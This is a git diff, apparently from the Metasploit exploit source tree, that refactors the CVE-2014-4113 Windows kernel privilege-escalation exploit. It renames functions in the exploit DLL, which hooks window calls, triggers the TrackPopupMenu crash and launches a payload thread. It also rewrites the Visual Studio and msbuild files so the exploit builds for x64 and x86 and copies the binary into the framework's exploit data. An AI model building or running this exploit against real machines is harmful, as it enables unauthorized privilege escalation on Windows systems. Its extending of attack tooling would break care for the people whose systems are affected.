-	if (SetWindowsHookExA(WH_CALLWNDPROC, HookCallback, NULL, GetCurrentThreadId()) == NULL) {
-		LogMessage("[!] SetWindowsHookExA failed :-(\n");
-		DestroyMenu(MenuTwo);
-		DestroyMenu(MenuOne);
+	if (SetWindowsHookExA(WH_CALLWNDPROC, hook_callback, NULL, GetCurrentThreadId()) == NULL)
+	{
+		dprintf("[!] SetWindowsHookExA failed :-(");
+		DestroyMenu(hMenuTwo);
+		DestroyMenu(hMenuOne);
 		return;
 	}
 
 	// 'crash' it!
-	TrackPopupMenu(MenuTwo, 0, -10000, -10000, 0, hWnd, NULL);
+	TrackPopupMenu(hMenuTwo, 0, -10000, -10000, 0, hWnd, NULL);
 
 	// If everything worked process should be privileges at this point
-	LogMessage("[!] Executing payload...");
-	CreateThread(0, 0, ExecutePayload, lpPayload, 0, NULL);
-	return;
+	dprintf("[!] Executing payload...");
+	CreateThread(0, 0, execute_payload, lpPayload, 0, NULL);
 }
 
-BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
+{
 	BOOL bReturnValue = TRUE;
-	switch (dwReason) {
+	switch (dwReason)
+	{
 	case DLL_QUERY_HMODULE:
 		hAppInstance = hinstDLL;
-		if (lpReserved != NULL) {
+		if (lpReserved != NULL)
+		{
 			*(HMODULE *)lpReserved = hAppInstance;
 		}
 		break;
 	case DLL_PROCESS_ATTACH:
 		hAppInstance = hinstDLL;
-		Win32kNullPage(lpReserved);
+		win32k_null_page(lpReserved);
 		break;
 	case DLL_PROCESS_DETACH:
 	case DLL_THREAD_ATTACH:
@@ -487,4 +496,4 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
 		break;
 	}
 	return bReturnValue;
-};
+}
diff --git a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.vcxproj b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.vcxproj
index fe5f68951d..8988c99265 100755
--- a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.vcxproj
+++ b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.vcxproj
@@ -1,5 +1,5 @@
 <?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
   <ItemGroup Label="ProjectConfigurations">
     <ProjectConfiguration Include="Debug|Win32">
       <Configuration>Debug</Configuration>
@@ -19,132 +19,224 @@
     </ProjectConfiguration>
   </ItemGroup>
   <PropertyGroup Label="Globals">
-    <ProjectGuid>{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}</ProjectGuid>
-    <RootNamespace>cve20144113</RootNamespace>
+    <ProjectGuid>{E80F11CD-6698-492F-B4B0-1A2348A24BB0}</ProjectGuid>
+    <RootNamespace>cve-2014-4113</RootNamespace>
+    <Keyword>Win32Proj</Keyword>
   </PropertyGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <WholeProgramOptimization>false</WholeProgramOptimization>
-    <CharacterSet>MultiByte</CharacterSet>
-    <PlatformToolset>v120</PlatformToolset>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>true</UseDebugLibraries>
-    <WholeProgramOptimization>false</WholeProgramOptimization>
-    <CharacterSet>MultiByte</CharacterSet>
-    <PlatformToolset>v120</PlatformToolset>
-  </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
     <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>false</WholeProgramOptimization>
     <CharacterSet>MultiByte</CharacterSet>
-    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
+    <PlatformToolset>v120_xp</PlatformToolset>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
     <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <UseDebugLibraries>false</UseDebugLibraries>
-    <WholeProgramOptimization>false</WholeProgramOptimization>
     <CharacterSet>MultiByte</CharacterSet>
-    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>false</WholeProgramOptimization>
+    <PlatformToolset>v120_xp</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <CharacterSet>MultiByte</CharacterSet>
+    <PlatformToolset>v120_xp</PlatformToolset>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <CharacterSet>MultiByte</CharacterSet>
+    <PlatformToolset>v120_xp</PlatformToolset>
   </PropertyGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
   <ImportGroup Label="ExtensionSettings">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
   </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
-  </ImportGroup>
-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+  <ImportGroup Label="PropertySheets">
     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
   </ImportGroup>
   <PropertyGroup Label="UserMacros" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
-    <IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
+  <PropertyGroup>
+    <_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
+    <OutDir>$(Configuration)\$(Platform)\</OutDir>
+    <IntDir>$(Configuration)\$(Platform)\</IntDir>
+    <LinkIncremental>false</LinkIncremental>
+    <GenerateManifest>false</GenerateManifest>
+    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
+    <CodeAnalysisRules />
+    <CodeAnalysisRuleAssemblies />
+    <TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
   </PropertyGroup>
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     <ClCompile>
-      <CompileAs>CompileAsC</CompileAs>
-      <WarningLevel>Level3</WarningLevel>
       <Optimization>Disabled</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <TreatWarningAsError>true</TreatWarningAsError>
     </ClCompile>
     <Link>
+      <AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
       <GenerateDebugInformation>true</GenerateDebugInformation>
-      <OptimizeReferences>true</OptimizeReferences>
-      <OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
+      <SubSystem>Windows</SubSystem>
+      <TargetMachine>MachineX86</TargetMachine>
+      <ModuleDefinitionFile>
+      </ModuleDefinitionFile>
+      <AdditionalOptions>/ignore:4070</AdditionalOptions>
     </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
+exit 0</Command>
+    </PostBuildEvent>
+    <ResourceCompile>
+      <PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ResourceCompile>
   </ItemDefinitionGroup>
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
     <ClCompile>
-      <CompileAs>CompileAsC</CompileAs>
-      <WarningLevel>Level3</WarningLevel>
       <Optimization>Disabled</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <TreatWarningAsError>true</TreatWarningAsError>
     </ClCompile>
     <Link>
+      <AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
       <GenerateDebugInformation>true</GenerateDebugInformation>
-      <OptimizeReferences>true</OptimizeReferences>
-      <OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
+      <SubSystem>Windows</SubSystem>
+      <ModuleDefinitionFile>
+      </ModuleDefinitionFile>
+      <AdditionalOptions>/ignore:4070</AdditionalOptions>
     </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
+exit 0</Command>
+    </PostBuildEvent>
+    <ResourceCompile>
+      <PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ResourceCompile>
   </ItemDefinitionGroup>
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
     <ClCompile>
-      <CompileAs>CompileAsC</CompileAs>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <CompileAs>Default</CompileAs>
+      <Optimization>MinSpace</Optimization>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <IntrinsicFunctions>false</IntrinsicFunctions>
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <StringPooling>true</StringPooling>
       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
+      <ObjectFileName>$(OutDir)\</ObjectFileName>
+      <ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+      <BufferSecurityCheck>false</BufferSecurityCheck>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+      <TreatWarningAsError>true</TreatWarningAsError>
     </ClCompile>
     <Link>
+      <AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
+      <IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
+      <DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
       <GenerateDebugInformation>false</GenerateDebugInformation>
-      <OptimizeReferences>true</OptimizeReferences>
-      <OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
+      <GenerateMapFile>true</GenerateMapFile>
+      <MapFileName>$(OutDir)\cve-2014-4113.map</MapFileName>
+      <SubSystem>Windows</SubSystem>
+      <OptimizeReferences>
+      </OptimizeReferences>
+      <EnableCOMDATFolding>
+      </EnableCOMDATFolding>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <DataExecutionPrevention>
+      </DataExecutionPrevention>
+      <ImportLibrary>$(OutDir)\cve-2014-4113.lib</ImportLibrary>
+      <TargetMachine>MachineX86</TargetMachine>
+      <Profile>false</Profile>
+      <ModuleDefinitionFile>
+      </ModuleDefinitionFile>
+      <AdditionalOptions>/ignore:4070</AdditionalOptions>
     </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
+IF EXIST "..\..\..\..\..\data\exploits\CVE-2014-4113\" GOTO COPY
+    mkdir "..\..\..\..\..\data\exploits\CVE-2014-4113\"
+:COPY
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2014-4113\"</Command>
+    </PostBuildEvent>
   </ItemDefinitionGroup>
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
     <ClCompile>
-      <CompileAs>CompileAsC</CompileAs>
-      <WarningLevel>Level3</WarningLevel>
-      <Optimization>Disabled</Optimization>
-      <FunctionLevelLinking>true</FunctionLevelLinking>
-      <IntrinsicFunctions>true</IntrinsicFunctions>
-      <CompileAs>Default</CompileAs>
+      <Optimization>MinSpace</Optimization>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <IntrinsicFunctions>false</IntrinsicFunctions>
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <StringPooling>true</StringPooling>
       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
+      <ObjectFileName>$(OutDir)\</ObjectFileName>
+      <ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+      <BufferSecurityCheck>false</BufferSecurityCheck>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+      <TreatWarningAsError>true</TreatWarningAsError>
     </ClCompile>
     <Link>
+      <AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
+      <IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
+      <DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
       <GenerateDebugInformation>false</GenerateDebugInformation>
-      <OptimizeReferences>true</OptimizeReferences>
-      <OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
+      <GenerateMapFile>true</GenerateMapFile>
+      <MapFileName>$(OutDir)\cve-2014-4113.map</MapFileName>
+      <SubSystem>Windows</SubSystem>
+      <OptimizeReferences>
+      </OptimizeReferences>
+      <EnableCOMDATFolding>
+      </EnableCOMDATFolding>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <DataExecutionPrevention>
+      </DataExecutionPrevention>
+      <ImportLibrary>$(OutDir)\cve-2014-4113.lib</ImportLibrary>
+      <Profile>false</Profile>
+      <ModuleDefinitionFile>
+      </ModuleDefinitionFile>
+      <AdditionalOptions>/ignore:4070</AdditionalOptions>
     </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.01 "$(TargetDir)$(TargetFileName)" &gt; NUL
+IF EXIST "..\..\..\..\..\data\exploits\CVE-2014-4113\" GOTO COPY
+    mkdir "..\..\..\..\..\data\exploits\CVE-2014-4113\"
+:COPY
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2014-4113\"</Command>
+    </PostBuildEvent>
   </ItemDefinitionGroup>
   <ItemGroup>
     <ClCompile Include="cve-2014-4113.c" />
   </ItemGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
   <ImportGroup Label="ExtensionTargets">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
   </ImportGroup>
 </Project>
\ No newline at end of file
diff --git a/external/source/exploits/cve-2014-4113/make.msbuild b/external/source/exploits/cve-2014-4113/make.msbuild
index c0690660ff..3292289649 100755
--- a/external/source/exploits/cve-2014-4113/make.msbuild
+++ b/external/source/exploits/cve-2014-4113/make.msbuild
@@ -4,14 +4,15 @@
     <SolutionPath>.\cve-2014-4113.sln</SolutionPath>
   </PropertyGroup>
 
-  <Target Name="all" DependsOnTargets="x86" />
+  <Target Name="all" DependsOnTargets="x86;x64" />
 
   <Target Name="x86">
-    <Message Text="Building CVE-2014-4113 win32k_null_page x86 Release version" />
+    <Message Text="Building CVE-2014-4113 track_popup_menu x86 Release version" />
     <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
   </Target>
 
   <Target Name="x64">
-    <Message Text="CVE-2014-4113 is not supported in x64" />
+    <Message Text="Building CVE-2014-4113 track_popup_menu x64 Release version" />
+    <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
   </Target>
 </Project>
diff --git a/external/source/exploits/make.bat b/external/source/exploits/make.bat
index 4884810d07..fb39b2e3c5 100755
--- a/external/source/exploits/make.bat
+++ b/external/source/exploits/make.bat
@@ -48,7 +48,7 @@ IF "%ERRORLEVEL%"=="0" (
 )
 
 IF "%ERRORLEVEL%"=="0" (
-  ECHO "Building CVE-2014-4113 (win32k_null_page)"
+  ECHO "Building CVE-2014-4113 (track_popup_menu)"
   PUSHD CVE-2014-4113
   msbuild.exe make.msbuild /target:%PLAT%
   POPD